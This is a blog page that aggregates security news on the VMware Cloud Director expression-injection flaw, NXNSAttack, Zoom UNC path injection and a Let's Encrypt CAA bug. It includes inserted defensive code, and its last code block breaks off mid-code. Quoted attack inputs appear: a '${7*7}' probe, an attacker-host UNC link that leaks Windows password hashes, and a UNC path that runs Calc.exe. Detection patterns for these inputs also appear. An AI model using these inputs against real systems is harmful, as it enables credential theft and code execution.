Critical VMware Cloud Director Flaw Lets Hackers Take Over Corporate Servers – Tempemail – Blog – 10 minute

Cybersecurity researchers today disclosed details of a new vulnerability in VMware’s Cloud Director platform that could allow an attacker to gain access to sensitive information and take control of private clouds across an entire infrastructure.
Tracked as CVE-2020-3956, the code injection flaw stems from improper input handling that an authenticated attacker could abuse by sending malicious traffic to Cloud Director, leading to the execution of arbitrary code.
It is rated 8.8 out of 10 on the CVSS v3 vulnerability severity scale, making it a critical vulnerability.

VMware Cloud Director is a popular deployment, automation, and management platform used to operate and manage cloud resources, allowing businesses to pool data centers distributed across different geographical locations into virtual data centers.
According to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface, and API access.
The vulnerability impacts VMware Cloud Director versions 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4.
The vulnerability was identified by Prague-based ethical hacking firm Citadelo after it was hired earlier this year by an unnamed Fortune 500 enterprise customer to carry out a security audit of its cloud infrastructure.

It has also published a proof-of-concept to demonstrate the exploit’s severity.
“Everything started with just a simple anomaly. When we entered ${7*7} as a hostname for the SMTP server in vCloud Director, we received the following error message: String value has an invalid format, value: [49],” Citadelo noted in its report. “It indicated some form of Expression Language injection, as we were able to evaluate simple arithmetic functions on the server-side.”
Using this as an entry point, the researchers said they were able to access arbitrary Java classes (e.g. “java.io.BufferedReader”) and instantiate them by passing malicious payloads.
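Two defender-side checks follow as an added example; this is not VMware’s or Citadelo’s code. The first is an inventory check of a Cloud Director version string against the fixed releases listed in the advisory; the second is strict allow-list validation of a hostname field, which refuses a probe such as ${7*7} before the value can reach any template or expression evaluation, together with a small detector for such markers in configuration audit records. The version strings and hostnames used are constructed.

```python
import re

# Added example, not VMware's or Citadelo's code. Version strings and hostnames are constructed.

# First fixed release per affected branch (10.0.x, 9.7.0.x, 9.5.0.x, 9.1.0.x), from the advisory.
FIXED_VERSIONS = {
    (10, 0): (10, 0, 0, 2),
    (9, 7): (9, 7, 0, 5),
    (9, 5): (9, 5, 0, 6),
    (9, 1): (9, 1, 0, 4),
}


def parse_version(version):
    """'9.7.0.3' -> (9, 7, 0, 3); shorter strings are padded with zeros."""
    parts = [int(p) for p in version.strip().split(".")]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def is_affected(version):
    """True if the build is in a listed branch and older than that branch's fix.
    Branches the advisory does not list return False: this check says nothing about them."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[:2])
    return fixed is not None and v < fixed


# One RFC 1123 hostname label: letters, digits and hyphens, 1-63 chars, no hyphen at either end.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Markers of template/expression syntax, for flagging probes in configuration audit logs.
EL_MARKER_RE = re.compile(r"[$#]\{")


def validate_hostname(value):
    """Return the normalised hostname or raise ValueError.
    Everything outside the allow-list is refused, so '${7*7}' never reaches an evaluator."""
    if not isinstance(value, str) or not value or len(value) > 253:
        raise ValueError("hostname missing or too long")
    host = value.rstrip(".")
    if not host or not all(LABEL_RE.match(label) for label in host.split(".")):
        raise ValueError(f"hostname outside the allow-list: {value!r}")
    return host.lower()


def is_valid_hostname(value):
    try:
        validate_hostname(value)
        return True
    except ValueError:
        return False


def looks_like_el_probe(value):
    """Detection helper: True for values carrying ${...} or #{...} template markers."""
    return isinstance(value, str) and EL_MARKER_RE.search(value) is not None
```

The point of the validator is that it is an allow-list, not a deny-list: it does not try to recognise every expression syntax, it accepts only what a hostname can contain, and anything else (including the ${7*7} probe Citadelo started from) is rejected with an error that does not echo an evaluated result.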

Citadelo said it was able to perform the following set of actions by exploiting the flaw:

View content of the internal system database, including password hashes of any customers allocated to this infrastructure.
Modify the system database to access foreign virtual machines (VM) assigned to different organizations within Cloud Director.
Escalate privileges from “Organization Administrator” to “System Administrator” with access to all cloud accounts by merely changing the password via an SQL query.
Modify the Cloud Director’s login page, allowing the attacker to capture passwords of another customer in plaintext, including System Administrator accounts.
Read other sensitive data related to customers, like full names, email addresses, or IP addresses.

After Citadelo privately disclosed the findings to VMware on April 1, the company patched the flaws in a series of updates spanning versions 9.1.0.4, 9.5.0.6, 9.7.0.5, and 10.0.0.2.
VMware has also released a workaround to mitigate the risk of attacks exploiting the issue.
“In general, cloud infrastructure is considered relatively safe because different security layers are being implemented within its core, such as encryption, isolating of network traffic, or customer segmentations. However, security vulnerabilities can be found in any type of application, including the Cloud providers themselves,” Tomas Zatko, CEO of Citadelo, said.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

New DNS Vulnerability Lets Attackers Launch Large-Scale DDoS Attacks – Tempemail – Blog – 10 minute

Israeli cybersecurity researchers have disclosed details about a new flaw in the DNS protocol that can be exploited to launch amplified, large-scale distributed denial-of-service (DDoS) attacks to take down targeted websites.
Called NXNSAttack, the flaw hinges on the DNS delegation mechanism to force DNS resolvers to generate many more DNS queries to authoritative servers of the attacker’s choice, potentially causing a botnet-scale disruption to online services.
“We show that the number of DNS messages exchanged in a typical resolution process might be much higher in practice than what is expected in theory, mainly due to a proactive resolution of name-servers’ IP addresses,” the researchers said in the paper.
“We show how this inefficiency becomes a bottleneck and might be used to mount a devastating attack against either or both, recursive resolvers and authoritative servers.”
Following responsible disclosure of NXNSAttack, several of the companies in charge of the internet infrastructure, including PowerDNS (CVE-2020-10995), CZ.NIC (CVE-2020-12667), Cloudflare, Google, Amazon, Microsoft, Oracle-owned Dyn, Verisign, and IBM Quad9, have patched their software to address the problem.

The DNS infrastructure has been previously at the receiving end of a rash of DDoS attacks through the infamous Mirai botnet, including those against Dyn DNS service in 2016, crippling some of the world’s biggest sites, including Twitter, Netflix, Amazon, and Spotify.

The NXNSAttack Method

A recursive DNS lookup happens when a DNS server communicates with multiple authoritative DNS servers in a hierarchical sequence to locate an IP address associated with a domain (e.g., www.google.com) and return it to the client.
This resolution typically starts with the DNS resolver run by your ISP or a public DNS service, such as Cloudflare (1.1.1.1) or Google (8.8.8.8), whichever is configured on your system.
The resolver passes the request to an authoritative DNS name server if it is unable to locate the IP address for a given domain name.
But if the first authoritative DNS name server also doesn’t hold the desired records, it returns a delegation message naming the next authoritative servers, which the DNS resolver can then query.

In other words, an authoritative server tells the recursive resolver: “I do not know the answer, go and query these and these name servers, e.g., ns1, ns2, etc., instead”.
This hierarchical process goes on until the DNS resolver reaches the correct authoritative server that provides the domain’s IP address, allowing the user to access the desired website.
Researchers found that this large, undesired overhead can be exploited to trick recursive resolvers into continuously sending a large number of packets to a targeted domain instead of to legitimate authoritative servers.
In order to mount the attack through a recursive resolver, the attacker must be in possession of an authoritative server, the researchers said.
“This can be easily achieved by buying a domain name. An adversary who acts as an authoritative server can craft any NS referral response as an answer to different DNS queries,” the researchers said.
The NXNSAttack works by sending a request for an attacker-controlled domain (e.g., “attacker.com”) to a vulnerable DNS resolver, which forwards the DNS query to the attacker-controlled authoritative server.
Instead of returning the addresses of the actual authoritative servers, the attacker-controlled authoritative server responds to the DNS query with a list of fake server names or subdomains, controlled by the threat actor, that point to a victim DNS domain.

The resolver then tries to look up all the nonexistent subdomains, creating a massive surge in traffic to the victim domain’s servers.
The researchers said the attack can amplify the number of packets exchanged by the recursive resolver by as much as a factor of more than 1,620, thereby not only overwhelming the DNS resolvers with more requests than they can handle, but also flooding the target domain with superfluous requests and taking it down.
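To make the amplification concrete, here is a toy recursive resolver, added as an example and not taken from the paper or from any resolver’s code. The three authoritative servers, their names and zone data are constructed; the resolver keeps no cache. With max_fetch=None it resolves every glueless name server in a referral eagerly, which is the behaviour the paper describes; max_fetch is a hypothetical per-delegation cap in the spirit of the limits the patched resolvers adopted, not any vendor’s exact setting.

```python
from collections import Counter

# Added example, not the researchers' code or any resolver's. All names are constructed.


def build_servers(n_fake):
    """Constructed authoritative data for four servers.
    'root' delegates attacker.example, victim.example and legit.example, each with glue.
    'attacker-ns' answers every query with a referral to n_fake name servers under
    victim.example and supplies no glue, so the resolver has to look each of them up.
    'victim-ns' is the target: none of those names exist, so it answers NXDOMAIN.
    'legit-ns' is an ordinary zone that simply answers, for a baseline."""
    fake = [f"ns{i}.victim.example" for i in range(n_fake)]

    def root(qname):
        for zone, ns in (("attacker.example", "attacker-ns"),
                         ("victim.example", "victim-ns"),
                         ("legit.example", "legit-ns")):
            if qname.endswith(zone):
                return {"type": "referral", "ns": [f"ns.{zone}"], "glue": {f"ns.{zone}": ns}}
        return {"type": "nxdomain"}

    def attacker(qname):
        return {"type": "referral", "ns": fake, "glue": {}}

    def victim(qname):
        return {"type": "nxdomain"}

    def legit(qname):
        return {"type": "answer", "addr": "192.0.2.10"}

    return {"root": root, "attacker-ns": attacker, "victim-ns": victim, "legit-ns": legit}


def resolve(qname, servers, counter, max_fetch=None, depth=0):
    """Minimal iterative resolution with no cache; counter records queries per server.
    max_fetch=None reproduces the vulnerable behaviour: every glueless NS name in a
    referral is resolved eagerly. A small max_fetch bounds that work per delegation."""
    if depth > 8:
        return None
    server = "root"
    while True:
        counter[server] += 1
        resp = servers[server](qname)
        if resp["type"] == "answer":
            return resp["addr"]
        if resp["type"] == "nxdomain":
            return None
        glue = dict(resp["glue"])
        glueless = [ns for ns in resp["ns"] if ns not in glue]
        if max_fetch is not None:
            glueless = glueless[:max_fetch]
        for ns in glueless:                       # the "proactive resolution" step
            addr = resolve(ns, servers, counter, max_fetch, depth + 1)
            if addr is not None:
                glue[ns] = addr
        usable = [ns for ns in resp["ns"] if ns in glue]
        if not usable:
            return None                           # every listed name server failed to resolve
        server = glue[usable[0]]


def queries_to_victim(n_fake, max_fetch=None):
    """Queries that one client lookup of www.attacker.example drives at victim-ns."""
    counter = Counter()
    resolve("www.attacker.example", build_servers(n_fake), counter, max_fetch)
    return counter["victim-ns"]


def total_queries(qname, n_fake=0, max_fetch=None):
    """Total queries the resolver sends for one client lookup of qname."""
    counter = Counter()
    resolve(qname, build_servers(n_fake), counter, max_fetch)
    return sum(counter.values())
```

A baseline lookup of www.legit.example costs two queries, while one lookup of the attacker’s name with a 100-name glueless referral sends 100 queries to the victim’s authoritative server and 202 in total; with max_fetch=4 the victim sees four. The real paper’s figure of more than 1,620 comes from combining this with further delegation levels, which the toy does not model.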

What’s more, using a botnet such as Mirai as the DNS client can further augment the scale of the attack.
“Controlling and acquiring a huge number of clients and a large number of authoritative NSs by an attacker is easy and cheap in practice,” the researchers said.
“Our initial goal was to investigate the efficiency of recursive resolvers and their behavior under different attacks, and we ended up finding a new seriously looking vulnerability, the NXNSAttack,” the researchers concluded.
“The key ingredients of the new attack are (i) the ease with which one can own or control an authoritative name server, and (ii) the usage of nonexistent domain names for name servers and (iii) the extra redundancy placed in the DNS structure to achieve fault tolerance and fast response time,” they added.
It’s highly recommended that network administrators who run their own DNS servers update their DNS resolver software to the latest version.


Windows 10 Flaw Lets Hackers Create Booby-Trapped Documents on Your PC | Tempemail – Blog – 10 minute

Sourced from Tech Advisor

Hackers are now exploiting a pair of previously unknown vulnerabilities in Microsoft Windows that can be used to create and plant documents booby-trapped with malware, helping them take over your computer, reports PC Mag.
On Monday Microsoft said via a security advisory that it is “aware of limited targeted attacks” abusing two flaws that, as of now, remain unpatched and still viable. The flaws are present in Windows 10, Windows 8.1 and Windows 7, along with various Windows Server versions. All are affected.
Microsoft has so far declined to disclose any details about the attacks or how prolific they have been.

In the advisory, Microsoft says that “There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.”

Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. https://t.co/tUNjkHNZ0N
— Security Response (@msftsecresponse) March 23, 2020

The two vulnerabilities are in the Windows Adobe Type Manager Library, which is used to parse and display Adobe-based fonts on a PC. Microsoft says the library mishandles a specially crafted multi-master font in the Adobe Type 1 PostScript format. That mishandling can lead to code execution, which an attacker can abuse to make the PC download and install additional malware.
Microsoft’s patch probably won’t arrive until about 14 April. The company has come up with a few temporary solutions to mitigate attacks in the meantime. These include:

Disabling the Preview Pane and Details Pane in Windows Explorer
Renaming the Adobe Type Manager Font Driver file “ATMFD.dll.”

With more people than ever working from their home computers during the coronavirus lockdown, these flaws couldn’t have been discovered at a worse time. Cybercriminals continue to prey on users when they are at the most vulnerable.
Microsoft’s History of Windows Flaws
Microsoft’s Windows is currently the most used desktop and laptop operating system on Earth, which means far more people are combing through its code to isolate flaws.
Recently, Windows 10 has been singled out for the many flaws that have plagued the system, most recently system crashes that completely delete user data.
Edited by Luis Monzon


Unpatched Zoom App Bug Lets Hackers Steal Your Windows Password – Tempemail – Blog – 10 minute

Zoom has been around for nine years, but the sudden need for an easy-to-use video conferencing app during the coronavirus pandemic made it overnight a favorite tool for millions of people.
Though Zoom is an efficient online video meeting solution, it’s still not the best choice in terms of privacy and security.
According to the latest finding by cybersecurity expert @_g0dmode, confirmed by researcher Matthew Hickey, the Zoom client for Windows is vulnerable to a ‘UNC path injection’ vulnerability that could let remote attackers steal login credentials for victims’ Windows systems.

The attack relies on the SMBRelay technique, in which Windows automatically exposes a user’s login username and NTLM password hash to a remote SMB server when attempting to connect to it and download a file hosted there.

The attack is possible only because Zoom for Windows supports remote UNC paths and converts such potentially insecure paths into clickable hyperlinks for recipients in personal and group chats.
To steal the Windows login credentials of a Zoom user, all an attacker needs to do is send a crafted UNC path (e.g., \\x.x.x.x\abc_file) to the victim over the chat interface and wait for the victim to click it once.
Easy, isn’t it, to convince people to click a random link over chat?

Note that the captured passwords are not in plaintext, but weak ones can be cracked in seconds using password-cracking tools such as Hashcat or John the Ripper.
In a shared environment, like an office, stolen login details can be reused immediately to compromise other users or IT resources and launch further attacks.

Zoom has already been notified of this bug, but since the flaw has not yet been patched, users are advised to either use alternative video conferencing software or use Zoom in their web browser instead of the dedicated client app.
Besides always using a strong password, Windows users can also change the security policy settings to restrict the operating system from automatically passing NTLM credentials to a remote server.
As we mentioned earlier, this is not the only privacy or security issue that has been uncovered in Zoom over the past couple of days.
Just yesterday, a report confirmed that Zoom doesn’t use end-to-end encryption to protect calling data of its users from prying eyes despite telling users that “Zoom is using an end to end encrypted connection.”


Windows flaw lets Zoom leak network credentials, runs code remotely – Security- Tempemail – Blog – 10 minute

Popular video conferencing service Zoom has a high risk security issue in its Windows client that can be used for limited remote code execution and, worse, to capture and replay security tokens to access network resources, security researchers have found.
Matthew Hickey of cybersecurity firm Hacker House that specialises in penetration testing and vulnerability analysis, told iTnews that the Zoom Windows desktop client is vulnerable to a high risk Universal Naming Convention (UNC) injection flaw in how the app handles Uniform Resource Identifier paths.
“An attacker can inject a link such as \\attacker.computer.com\company_salary.xlsx into the chat, should anyone click on the link it will expose their Windows username, domain name -or- computer name and a hashed version of their Windows password,” Hickey said.
“An attacker can replay those hashed password values and access services such as Microsoft Exchange, Outlook Webmail and Sharepoint,” he added.
Hickey tested a discovery from another researcher who goes by the _g0dmode moniker, and who noted it was possible to capture Windows network NT Lan Manager (NTLM) hashes using the flaw.
Expanding on the prior discovery of the vulnerability, Hickey told iTnews that it is possible to run commands and install malware on clients.
If an attacker tries to do that, newer versions of Windows will warn users that a remote code execution attack could be taking place.
For example, it is possible to trigger the classic Windows remote code execution proof of launching the built-in calculator app by sending a link like: \\127.0.0.1\C$\Windows\System32\Calc.exe
Alert dialogs are only displayed for executable files and commands however.
“If an attacker attempts to leak credentials, no such warning is displayed,” Hickey said.
Hickey demonstrated the credentials capture to iTnews.
The flaw affects Zoom’s Windows client only, Hickey said. On Apple’s macOS, the Zoom client doesn’t make the links clickable.
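The macOS behaviour just described, links that are not made clickable, is the mitigation a chat client should apply on every platform. The following is an added example, not Zoom’s code, of a chat-message renderer that hyperlinks only http(s) URLs and leaves a UNC path as inert text, plus a detector that flags UNC paths in chat logs so a defender can spot such messages. The sample chat lines and host names are constructed.

```python
import html
import re

# Added example, not Zoom's code. Sample messages and hosts below are constructed.

# Only these schemes are ever turned into links. file:// and UNC paths never match,
# so a Windows client will not be steered into an SMB connection by clicking.
URL_RE = re.compile(r"\bhttps?://[^\s<>]+", re.IGNORECASE)

# Two leading backslashes, a host that contains no backslash, a backslash, then the path.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]*")


def unc_paths(text):
    """All UNC paths found in a piece of chat text."""
    return UNC_RE.findall(text)


def render_message(text):
    """HTML for one chat line: http(s) URLs become anchors, everything else is escaped text.
    A UNC path therefore reaches the screen as plain characters with no href behind it."""
    out = []
    pos = 0
    for m in URL_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        safe = html.escape(m.group(0), quote=True)
        out.append(f'<a href="{safe}">{safe}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


# Constructed chat log: (sender, message).
SAMPLE_CHAT = [
    ("alice", "agenda: https://intranet.example/meeting/42"),
    ("mallory", r"please review \\203.0.113.7\docs\salary.xlsx before the call"),
    ("bob", "thanks, will do"),
]


def flag_messages(messages):
    """Detection pass over a chat log: (sender, unc_path) for every UNC path seen."""
    return [(sender, path) for sender, msg in messages for path in unc_paths(msg)]
```

Rendering is allow-list based: the renderer never has to recognise every dangerous form (UNC, file://, or anything else that resolves to a network share) because it only ever links http and https. The detector is the complementary monitoring control, useful for reviewing chat exports after the fact.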
Despite the warnings when attackers attempt to run code remotely, Hickey said the flaw should be rated as a serious one.
“I would usually score this as a medium risk issue, however in light of the fact that the issue is easily exploited through “ZoomBombing” (guessing the meeting ID’s through brute-force) and more susceptible to exploitation in the working from home climate, I would advise that it is a high risk issue,” he said.
Hickey has reported the issue to Zoom via Twitter.
As its popularity has climbed with people and students working from home in coronavirus lockdowns, the security of Zoom has come under intense scrutiny.
Other researchers have found that Zoom’s Company Directory feature leaks email addresses and photos, and that the video conferencing app does not use end-to-end encryption to protect calls from interception.
The United States Federal Bureau of Investigation’s Boston office also issued an alert over the rash of ZoomBombing attacks, in which uninvited people hijack video conferences, in some cases exposing themselves and/or posting obscene material.
iTnews has sought comment from Zoom on the vulnerability and will update the story when it arrives.


Plague Inc.’s new mode lets players save the world from a pandemic instead of destroying it – Blog – 10 minute

In a nutshell: Plague Inc., the strategy game that tasks players with creating a disease for wiping out humanity, might feel a little too close to reality right now, but it’s getting a new mode that’s a lot more optimistic: save the world from an outbreak instead of destroying it.
Plague Inc.’s developer, Ndemic Creations, recently donated $250,000 to help in the battle against the coronavirus. The money was split between the Coalition of Epidemic Preparedness Innovations (CEPI) and the World Health Organization’s Covid-19 Solidarity Response Fund.
Plague Inc.’s creator, James Vaughan, said that when the game was released eight years ago, he “never imagined the world would come to resemble a game of Plague Inc. or that so many players would be using Plague Inc. to get them through an actual pandemic.”
“We are proud to be able to help support the vital work of the WHO and CEPI as they work towards finding a vaccine for Covid-19.”

When arranging the donation with the WHO and CEPI, the studio was repeatedly asked if it could add a new game mode in which players worked to stop a deadly disease outbreak. The company is now accelerating work on this new game mode, which involves managing disease progression, boosting healthcare systems, and “controlling real-world actions such as triaging, quarantining, social distancing and closing of public services.”
Ndemic Creations says the update, which is being developed “with the help of experts from the WHO, CEPI, and more,” will be free for all players during the pandemic, and that it will release more information as soon as possible. The company will also be promoting the WHO’s Covid-19 response fund within the game for anyone wishing to donate.
Back in January when the coronavirus was mostly located within China, Plague Inc. experienced a surge in popularity, resulting in the devs reminding people that “it’s a game, not a scientific model.”


10 minutes mail – Also known by names like : 10minemail, 10minutemail, 10mins email, mail 10 minutes, 10 minute e-mail, 10min mail, 10minute email or 10 minute temporary email. 10 minute email address is a disposable temporary email that self-destructed after a 10 minutes.Tempemail.co – is most advanced throwaway email service that helps you avoid spam and stay safe. Try tempemail and you can view content, post comments or download something anonymously on Internet.


DoNotPay’s extension lets you share streaming services without revealing your password – Blog – 10 minute

In a nutshell: Sharing online account passwords with friends and family is something many people do, but not everyone is comfortable with revealing their credentials. Now, a new Chrome extension will allow you to share access to Netflix, Spotify, Disney+, etc. without divulging login details.
The extension comes from DoNotPay, which was behind the AI-powered “robot lawyer” app that helps users contest parking tickets. It can also help refugees apply for asylum protection, aid consumers in suing robocallers, and even ‘sue anyone’ by “pressing a button.”
Once you install the DoNotPay Chrome extension, head to a website you’d like to share with someone. It’s then a matter of hitting the DoNotPay icon at the top of the browser and selecting Generate Link, which creates a shareable link that can be sent or emailed. If you’re not into sharing passwords freely, an exchange feature lets you trade subscriptions, so you can swap access to an account, say Netflix, for access to someone’s Disney+ account.

Recipients of the links need to have the DoNotPay extension installed and will be logged into a sender’s account automatically after verifying their identity. As it works by transferring the cookie of a logged-in session, nobody will see your password. The company says (via VentureBeat) it does not store the cookies or have access to them, and that they are encrypted in transit.
While people you share accounts with will be able to make minor changes, such as adding titles to watch lists, they won’t be able to change passwords or two-factor authentication details.
DoNotPay creator Joshua Browder said there’s no limit on the number of people you can share an account with, though many services do restrict how many devices can stream their content simultaneously.
Most online subscription services’ policies restrict the sharing of usernames and passwords, and while DoNotPay isn’t technically giving away these details, the companies are unlikely to see it that way.



Jailbreak lets users run Android on iPhones – Security – Telco/ISP- Tempemail – Blog – 10 minute

Mobile virtualisation company Corellium has released a version of Android that runs on certain iPhones, by using a so-called jailbreak, a vulnerability that bypasses Apple’s strict software and security restrictions on devices.
Known as Project Sandcastle, Corellium’s Android version is released as beta software that has only received limited testing, and users are warned to be cautious when installing it.
The jailbreak that Sandcastle is based on is the Checkra1n exploit that was discovered in September last year and the PongoKit software development kit and PongoOS operating system.
By using Checkra1n, it is possible to bypass Apple’s boot read-only memory protections and run a copy of Google’s Android mobile operating system in memory on iPhones.
Sandcastle does not persist on the device, and users can return to iOS by rebooting their iPhones.
Presently, only iPhone 7 and 7+ that appeared in 2016 are supported by Sandcastle, along with iPod 7G.
Sandcastle can’t make use of the graphics processor on iPhone 7s, or the audio circuitry and camera.
Nor do cellular and Bluetooth connections work yet, but WiFi runs, making it possible to use over-the-top apps such as Signal for calls and messaging.
A Linux build of Sandcastle is also available, and Corellium has released the source code for the software on Github.
Corellium’s work on iPhone virtualisation has been noticed by Apple, which has taken the company to court, alleging that developing software that can be used to jailbreak devices violates the trafficking provisions in the United States Digital Millennium Copyright Act (DMCA).


Let’s Encrypt Revoking 3 Million TLS Certificates Issued Incorrectly Due to a Bug – Tempemail – Blog – 10 minute

The most popular free certificate signing authority Let’s Encrypt is going to revoke more than 3 million TLS certificates within the next 24 hours that may have been issued wrongfully due to a bug in its Certificate Authority software.
The bug, which Let’s Encrypt confirmed on February 29 and was fixed two hours after discovery, impacted the way it checked the domain name ownership before issuing new TLS certificates.
As a result, the bug opened up a scenario where a certificate could be issued even without adequately validating the holder’s control of a domain name.
The Certification Authority Authorization (CAA), an internet security policy, allows domain name holders to indicate to certificate authorities (CAs) whether or not they are authorized to issue digital certificates for a specific domain name.

Let’s Encrypt considers domain validation results good only for 30 days from the time of validation, after which it rechecks the CAA record authorizing that domain before issuing the certificate. The bug — which was uncovered in the code for Boulder, the certificate signing software used by Let’s Encrypt — is as follows:

“When a certificate request contained N domain names that needed CAA rechecking, Boulder would pick one domain name and check it N times.” In other words, when Boulder needed to recheck, for example, a group of 5 domain names, it would check one domain name 5 times as opposed to checking each of the 5 domains once.
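The defect is easier to see beside its fix. What follows is an added example, a reconstruction in Python rather than Boulder’s own Go code: the CAA policy table, the five-name certificate request and the CAA lookup function are constructed, and the only thing modelled is the loop shape the quoted sentence describes.

```python
# Added example, not Boulder's code: a reconstruction of the CAA-rechecking defect
# described above, beside the corrected loop. All data here is constructed.

# Constructed CAA state: which names currently permit issuance by this CA.
# At initial validation all five allowed it; since then the owner of shop.example
# has published a CAA record naming a different CA.
CAA_ALLOWS_ISSUANCE = {
    "www.example": True,
    "mail.example": True,
    "shop.example": False,   # changed after the initial validation
    "blog.example": True,
    "api.example": True,
}

# Constructed certificate request that needs CAA rechecking for all five names.
REQUEST = ["www.example", "mail.example", "shop.example", "blog.example", "api.example"]


def caa_allows(name, policy=CAA_ALLOWS_ISSUANCE):
    """Stand-in for a live CAA lookup: does 'name' currently permit issuance?"""
    return policy.get(name, False)


def recheck_caa_buggy(names, lookup=caa_allows):
    """Reproduces the defect: one name is picked and queried len(names) times, so a
    CAA change on any other name in the request is never seen.
    Returns (issuance_allowed, names_actually_queried)."""
    queried = []
    if not names:
        return True, queried
    chosen = names[0]            # the loop variable is never used below
    allowed = True
    for _ in names:
        queried.append(chosen)
        allowed = allowed and lookup(chosen)
    return allowed, queried


def recheck_caa_fixed(names, lookup=caa_allows):
    """Checks every name exactly once; issuance is refused if any name now forbids it."""
    queried = []
    allowed = True
    for name in names:
        queried.append(name)
        allowed = allowed and lookup(name)
    return allowed, queried
```

On the constructed request the buggy loop queries www.example five times and approves issuance, never noticing that shop.example now forbids it; the fixed loop queries each name once and refuses. The lesson for code review is the one-line shape of the bug: a loop that iterates over a collection but reads a variable captured outside it.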

The company said the bug was introduced as part of an update back in July 2019.
This means that Let’s Encrypt might have issued certificates that it shouldn’t have in the first place, as a result of which it’s revoking all the TLS certificates that were affected by the bug.
The development comes as Let’s Encrypt project announced last week that it had issued its one-billionth free TLS certificate since its launch in 2015.

Let’s Encrypt said 2.6 percent of approximately 116 million active certificates are affected — about 3,048,289 — out of which about one million are duplicates of other affected certificates.
Affected website owners have until 8PM UTC (3PM EST) March 4 to manually renew and replace their certificates, failing which visitors to the websites will be greeted with TLS security warnings — as the certificates are revoked — until the renewal process is complete.
It’s worth noting that the certificates issued by Let’s Encrypt are valid for a period of 90 days, and ACME clients such as Certbot are capable of automatically renewing them.
But with Let’s Encrypt revoking all impacted certificates, website admins will have to perform a forced renewal to prevent any interruptions.
Besides using the tool https://checkhost.unboundtest.com/ to check if a certificate needs replacement, Let’s Encrypt has put together a downloadable list of affected serial numbers, allowing subscribers to check if their websites rely on an affected certificate.


Let’s Encrypt Issued A Billion Free SSL Certificates in the Last 4 Years

Let’s Encrypt, a free, automated, and open certificate authority (CA) run by the nonprofit Internet Security Research Group (ISRG), has said it’s issued a billion certificates since its launch in 2015.
The CA issued its first certificate in September 2015, before eventually reaching 100 million in June 2017. Since late last year, Let’s Encrypt has issued at least 1.2 million certificates each day.
The development comes as over 80 percent of web page loads worldwide now use HTTPS, and 91 percent in the US alone.
HTTPS, the default means of secure communication on the internet, comes with three benefits: authentication, integrity, and encryption. It allows HTTP requests to be transmitted over a secure encrypted channel, thus protecting users from an array of malicious activities, including site forgery and content manipulation.

“Since 2017, browsers have started requiring HTTPS for more features, and they’ve greatly improved the ways in which they communicate to their users about the risks of not using HTTPS,” the company said. “When websites put their users at risk by not using HTTPS, major browsers now show stronger warnings. Many sites have responded by deploying HTTPS.”
Launched with the goal of speeding up the web’s encryption rate and bringing down the costs of enabling HTTPS, Let’s Encrypt’s ACME (Automatic Certificate Management Environment) protocol offers an easy means to set up and issue SSL certificates that can be renewed and replaced without manual intervention from webmasters.
Electronic Frontier Foundation’s Certbot is one such popular open-source, free-to-use ACME client that enables HTTPS on websites by automatically deploying Let’s Encrypt certificates — which are valid only for 90 days — and managing renewals.
But with bad actors abusing Let’s Encrypt HTTPS certificates to mask malicious traffic and direct unsuspecting users to malicious sites, the company has taken steps to “ensure that a certificate applicant actually controls the domain they want a certificate for.”

Apple Takes a Significant Step Forward

But that’s not all. Apple has managed to do what most CAs were hesitant to accomplish all this time: shorten the maximum validity of issued certificates to one year.
The tech giant recently announced that starting 1st September 2020, Safari will reject new HTTPS certificates that expire more than 13 months (or 398 days) from their creation date, effectively bringing down the maximum certificate lifetime from 825 days.

This follows a failed ballot held last September by CA/Browser Forum to reduce certificate lifetimes. Although Let’s Encrypt, certSIGN, Apple, Cisco, Google, Microsoft, Mozilla, and Opera voted in favor of the move, close to two-thirds of participating CAs rejected the idea.
Apple’s move to shorten the lifespan of HTTPS certificates means that CAs like Let’s Encrypt and ACME clients such as Certbot will only become more valuable going forward, as it forces website administrators to use certificates issued for 1 year or less.
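Two of the checks an administrator needs after reading this page, whether a certificate's serial is on the affected list mentioned above and whether its lifetime fits the 398-day cap described here, both start from two fields inside the certificate: the serial number and the validity period. The following is an added example, not code from Let's Encrypt, Apple or Certbot, that walks the DER structure of a certificate far enough to read those two fields and then applies both checks. To keep it runnable offline it also contains a small DER encoder that builds an unsigned, syntactically valid certificate skeleton; the serials, dates and affected-serial list are constructed, and the rendering of Apple's policy (398 days for certificates issued on or after 1 September 2020, 825 before) is a simplification of the text, not Safari's exact logic.

```python
"""Read serial and validity from a DER certificate, then apply two checks:
membership in an affected-serial list and the 398-day lifetime cap.
Added example; the encoder only builds an unsigned test skeleton (placeholder
OIDs, empty issuer/subject, dummy key), not a real certificate.
"""
from datetime import datetime, timedelta
from typing import Iterable, Tuple

SHA256_RSA_OID = b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b"   # 1.2.840.113549.1.1.11


def _tlv(tag: int, body: bytes) -> bytes:
    """DER tag-length-value with short or long length form as needed."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _der_int(v: int) -> bytes:
    # Minimal big-endian encoding with a leading 0x00 when the top bit is set.
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def _utctime(t: datetime) -> bytes:
    return _tlv(0x17, t.strftime("%y%m%d%H%M%SZ").encode())


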